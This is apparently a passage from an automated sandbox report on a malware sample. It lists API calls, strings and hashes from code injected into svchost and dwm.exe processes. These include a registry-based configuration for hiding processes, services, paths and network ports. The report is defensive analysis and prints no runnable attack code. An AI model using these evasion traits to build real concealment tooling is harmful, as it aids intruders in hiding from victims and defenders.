PathCombineW.SHLWAPI ref: 00000233B91E324C

Strings

\\.\pipe\, xrefs: 00000233B91E3218

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 297a192159ec69f6550288766db73de6228b47274bb3a8eb2548bd6c392764c8
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: B0F08220304B8993EB10CB53B918269E232EB48FD8F088131DE9A07B69DE2CC7879300

Function 00000233B91EA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000233B91EA154
GetProcAddress.KERNEL32 ref: 00000233B91EA16A
FreeLibrary.KERNEL32 ref: 00000233B91EA187

Strings

CorExitProcess, xrefs: 00000233B91EA163
mscoree.dll, xrefs: 00000233B91EA14B

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 73bdd454e49e9e538bf6d561795ee9be9c347ef46b7cbb2787323fa46baf0f41
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 0DF01961311B4896EF54DB50E88C3699772AF447D8F441015950B455B5DF2CC78DD700

Function 00000233B91E51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000233B91E5236

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 441d3fa55e291b73ca124278637fde4ff12564db832a7e84ebcd08bfff2692ea
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 5E02B936219B84CAEBA0CB55E49435AF7B1F3C4794F104115EA8E87BA9DF7CC694DB00

Function 00000233B91F0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000233B91F08A2
GetConsoleMode.KERNEL32 ref: 00000233B91F0960
GetLastError.KERNEL32 ref: 00000233B91F09EA

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 002647c1226ca95a86a03ac361684ef80b79a7b0c378e09da3db284974cd1d10
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 0381D222A10A1C89FB50EF6198487ADABBBF746B9CF444116DE0A53797DB3C8742E310

Function 00000233B91E57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000233B91E5806

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 57c044dae3fe69c14c68a81ebb1dd9c2dddc657cb3973a20772345280b28f23a
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: 2F61DA36519B88CAEB60CB15E44872AF7B6F388748F100115EA8E43BA9CB7CC740EF04

Function 00000233B91F1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000233B91F1EE0
_set_statfp.LIBCMT ref: 00000233B91F1EFB
_set_statfp.LIBCMT ref: 00000233B91F1F17
_set_statfp.LIBCMT ref: 00000233B91F1F53

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 8bd252a0584f49020ff17bafda1bff8ec2a10d24449c40a92db1479c40405cfb
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: F011E522E54E0802F6A8D168E45E369D0737BA437CF4986A4BE7B463D7CB1CAF467200

Function 00000233B91C12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00000233B91C12E0
_set_statfp.LIBCMT ref: 00000233B91C12FB
_set_statfp.LIBCMT ref: 00000233B91C1317
_set_statfp.LIBCMT ref: 00000233B91C1353

Memory Dump Source

Source File: 0000001F.00000002.2676152738.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91b0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: b8fb19b5785ead4d6940b5f1e30091217cc1ace5589ec4a29469d8ef268d4c11
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 66114826BC0E4001F7A4D169E45F3A980736F5677CF88D234EA760EBDA8A5CCF42B200

Function 00000233B91E3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00000233B91E3886
GetCurrentProcess.KERNEL32 ref: 00000233B91E38B4
VirtualProtectEx.KERNEL32 ref: 00000233B91E38D6
GetCurrentProcess.KERNEL32 ref: 00000233B91E38F4
VirtualProtectEx.KERNEL32 ref: 00000233B91E3915

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: e43fd9aae555228ea9cb1d39e149519a021206d0d64bf0aed497958a38f6a294
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: EB111E2A705B4987EB14DB11F4087AAE6B6F748B88F044129DE8D07799EF3DC746D704

Function 00000233B91B84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000233B91B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000233B91B8598

Strings

f, xrefs: 00000233B91B8516
csm, xrefs: 00000233B91B857E

Memory Dump Source

Source File: 0000001F.00000002.2676152738.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91b0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 714e2900678d4b5d8a1ab39b2db65d2e2c1f5a5a64fef19df016f7d7549a59ad
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: C551AE327126418BEB14DF25E848B59B7B7F348F9CF9181A4DA1A47788EB38DB41E704

Function 00000233B91B84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000233B91B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 00000233B91B8598

Strings

f, xrefs: 00000233B91B8516
csm, xrefs: 00000233B91B857E

Memory Dump Source

Source File: 0000001F.00000002.2676152738.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91b0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: cf8ccdfa06f8a028b0253bb6d62fc00d941d8709a0f10dfae573313cbf425ee9
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: F031897221179186EB14EF16E888B19B7B7F788F9CF158054AE5A07788DB3CCB41E708

Function 00000233B91E14B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000233B91E14D5
HeapFree.KERNEL32 ref: 00000233B91E14E4
GetProcessHeap.KERNEL32 ref: 00000233B91E14F0
HeapFree.KERNEL32 ref: 00000233B91E14FF
GetProcessHeap.KERNEL32 ref: 00000233B91E152A

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction ID: b1697c0ba6abf2e851c55edf5432df405795916d54647b3619bcd8e01bd74cef
Opcode Fuzzy Hash: fc420431358bd0942ab8cb7418bab57f420269e40f755e9827258351f81f4a45
Instruction Fuzzy Hash: 94111C31618F8897E754DF66A84825AB372F789BC8F044029DB8A03759DF3CC3529740

Function 00000233B91E26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000233B91E27D4
StrCpyW.SHLWAPI ref: 00000233B91E27ED

Strings

\\.\pipe\, xrefs: 00000233B91E27DF

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 2307d5aac5c3a430fcb001e777ab87beb4f447039e8dbaa1746a9a36d24053c8
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: CA71D432600F898AE728DF25D9683AAE7B6F748B8CF445416DD4943B89DE3CCB05E700

Function 00000233B91E24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000233B91E25C3
StrCpyW.SHLWAPI ref: 00000233B91E25DA

Strings

\\.\pipe\, xrefs: 00000233B91E25CE

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 57fd35b2d08bb9f2e5dbf2817666026e862466b17fc9a9cbb11d883972d35b33
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: BD510C32604B898AE634DF25956C3AAE7B3F78D788F904525DD8A03B99CE3DC7059B40

Function 00000233B91F0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000233B91F071B
GetLastError.KERNEL32 ref: 00000233B91F073D

Strings

U, xrefs: 00000233B91F06C7

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 84ee0ac7c68ce9695c18dd05a9dd88ca3522d06c920966a326d36f587b6e2b76
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 1341A572314A8485EB20DF25E448399F7B6F398798F844125EE8D87799EB3CC741DB50

Function 00000233B91ED6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000233B91ED6F9
LCMapStringW.KERNEL32 ref: 00000233B91ED781

Strings

LCMapStringEx, xrefs: 00000233B91ED6DC, 00000233B91ED6ED

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: c88e334e8023c08e58def4d184bb8e5ce997cf4a76b0ff7cac6c1f49b598f07a
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 6611273A608B8486D760CB16B48439AB7B1F7C8BC8F544126EA8D83B59DF3CC7408B00

Function 00000233B91E94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000233B91E94E8
RaiseException.KERNEL32 ref: 00000233B91E952E

Strings

csm, xrefs: 00000233B91E951B

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: dafe9f663e788d1327535ec029d043883d6a05b2116db44cb92cdb02ed8b5620
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 2F110A32218B8482EB61CF15E544359B7A6FB88B98F184225EE8D0BB69DF3DC755DB00

Function 00000233B91ED65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000233B91ED68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000233B91ED6A7

Strings

InitializeCriticalSectionEx, xrefs: 00000233B91ED681

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 433821094f27ddce8ce8aac50579eb06698c203ded3791aab0311d78af7cc9bc
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 23F08225310B8892EB05DB42F44C795B332AB88BD8F485025A95E17B96CE3CCB95E710

Function 00000233B91ED608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000233B91ED631
TlsSetValue.KERNEL32 ref: 00000233B91ED648

Strings

FlsSetValue, xrefs: 00000233B91ED61E

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 4e321604b0b549ab605fe108d5963d00bf8c5fc5fe69e872d68b6b52a4519360
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: ABE06D65200A4992EB09CB50F84C7A8A233BB88788F884022D9090A696CE3CCB59E710

Function 00000233B91BCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000233B91BCBC5

Strings

October, xrefs: 00000233B91BCBBE
November, xrefs: 00000233B91BCBA8, 00000233B91BCBB2

Memory Dump Source

Source File: 0000001F.00000002.2676152738.00000233B91B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91b0000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: a642577c6d99fb3c5db0d9d10eb953b891b8e6d5f27291574b4021eda05eccc2
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: A2E0D82120864192FB04DB59F54E3EDE3339BA878CF599021D55A0A392CF3CCB86E340

Function 00000233B91E1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000233B91E1D9B
HeapAlloc.KERNEL32 ref: 00000233B91E1DAA
GetProcessHeap.KERNEL32 ref: 00000233B91E1E1E
HeapFree.KERNEL32 ref: 00000233B91E1E2C

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: d130857cf5c75058d72d92c9f8de2355bceb416a75ddf84240613a6608d5480c
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 59219522604F9486EB12CF59E50829AF3B1FB88B98F054110EE8D47B19EF7CC7429700

Function 00000233B91E1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000233B91E127A
HeapAlloc.KERNEL32 ref: 00000233B91E1289
GetProcessHeap.KERNEL32 ref: 00000233B91E12A3
HeapAlloc.KERNEL32 ref: 00000233B91E12B4

Memory Dump Source

Source File: 0000001F.00000002.2676704849.00000233B91E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000233B91E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_233b91e0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 1ffd3301e63ccac4be48c807580ed54d88c5c511933c1a87cd6ffe066957659c
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 9FE06DB161160487E704CF62D808389B6F2FB88F85F48C024C90A07355DF7D879AE740

Analysis Process: dwm.exePID: 984, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	94.1%
Signature Coverage:	0%
Total number of Nodes:	102
Total number of Limit Nodes:	16

Executed Functions

Function 0000021091921650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002109192165B
HeapAlloc.KERNEL32 ref: 000002109192166A

Part of subcall function 0000021091921274: GetProcessHeap.KERNEL32 ref: 000002109192127A
Part of subcall function 0000021091921274: HeapAlloc.KERNEL32 ref: 0000021091921289
Part of subcall function 0000021091921274: GetProcessHeap.KERNEL32 ref: 00000210919212A3
Part of subcall function 0000021091921274: HeapAlloc.KERNEL32 ref: 00000210919212B4

RegOpenKeyExW.ADVAPI32 ref: 00000210919216DA
RegOpenKeyExW.ADVAPI32 ref: 0000021091921707
RegCloseKey.ADVAPI32 ref: 0000021091921721
RegOpenKeyExW.ADVAPI32 ref: 0000021091921741
RegCloseKey.ADVAPI32 ref: 000002109192175C
RegOpenKeyExW.ADVAPI32 ref: 000002109192177C
RegCloseKey.ADVAPI32 ref: 0000021091921797
RegOpenKeyExW.ADVAPI32 ref: 00000210919217B7
RegCloseKey.ADVAPI32 ref: 00000210919217D2
RegOpenKeyExW.ADVAPI32 ref: 00000210919217F2
RegCloseKey.ADVAPI32 ref: 000002109192180D
RegOpenKeyExW.ADVAPI32 ref: 000002109192182D
RegCloseKey.ADVAPI32 ref: 0000021091921848
RegOpenKeyExW.ADVAPI32 ref: 0000021091921868
RegCloseKey.ADVAPI32 ref: 0000021091921883
RegOpenKeyExW.ADVAPI32 ref: 00000210919218A3
RegCloseKey.ADVAPI32 ref: 00000210919218BE
RegCloseKey.ADVAPI32 ref: 00000210919218C8

Part of subcall function 00000210919212C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000021091921326
Part of subcall function 00000210919212C8: GetProcessHeap.KERNEL32 ref: 0000021091921334
Part of subcall function 00000210919212C8: HeapAlloc.KERNEL32 ref: 0000021091921345
Part of subcall function 00000210919212C8: RegEnumValueW.ADVAPI32 ref: 00000210919213A1
Part of subcall function 00000210919212C8: GetProcessHeap.KERNEL32 ref: 00000210919213E9
Part of subcall function 00000210919212C8: HeapAlloc.KERNEL32 ref: 00000210919213F7
Part of subcall function 00000210919212C8: GetProcessHeap.KERNEL32 ref: 000002109192141B
Part of subcall function 00000210919212C8: HeapFree.KERNEL32 ref: 0000021091921429
Part of subcall function 00000210919212C8: lstrlenW.KERNEL32 ref: 0000021091921432
Part of subcall function 00000210919212C8: GetProcessHeap.KERNEL32 ref: 0000021091921440
Part of subcall function 00000210919212C8: HeapAlloc.KERNEL32 ref: 000002109192144E

Strings

process_names, xrefs: 0000021091921775
startup, xrefs: 00000210919216FD
paths, xrefs: 00000210919217B0
pid, xrefs: 000002109192173A
tcp_remote, xrefs: 0000021091921861
SOFTWARE\dialerconfig, xrefs: 00000210919216BA
udp, xrefs: 000002109192189C
tcp_local, xrefs: 0000021091921826
service_names, xrefs: 00000210919217EB

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 7207d848b36995486305cd917f3033597498a3aaa5057775028dc3bc28c92372
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: D2713C36310A51A6EF109F61E8E86D963B4F7A4FACF001521DE5E43B2ADFB8C995C300

Function 0000021091925C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0000021091925C4B
GetThreadContext.KERNEL32 ref: 0000021091925DB5

Part of subcall function 0000021091925A40: GetCurrentThreadId.KERNEL32 ref: 0000021091925A44

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction ID: 06b6f5f37f7a8c1a966f4cca8875ec561bd44706a1bb1294a4461b7c0650e82c
Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction Fuzzy Hash: B0D1BF36309B8895EA70DB1AE4A439A77A0F3D8F94F500516EADD47B66DF7CC981CB00

Function 00000210919251B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0000021091925236

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction ID: 2c570d43adf9bfce878e7bdb4154675606c9dbf78d3f3562fb962e55e0d3e954
Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction Fuzzy Hash: DA02ED36219B80C6E760CB55F4A439AB7A0F3D5B94F105415EA9E87BA9DFBCC884CF00

Function 0000021091923878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 0000021091923886
GetCurrentProcess.KERNEL32 ref: 00000210919238B4
VirtualProtectEx.KERNEL32 ref: 00000210919238D6
GetCurrentProcess.KERNEL32 ref: 00000210919238F4
VirtualProtectEx.KERNEL32 ref: 0000021091923915

Memory Dump Source

Source File: 00000020.00000002.2720066078.0000021091920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000021091920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_21091920000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
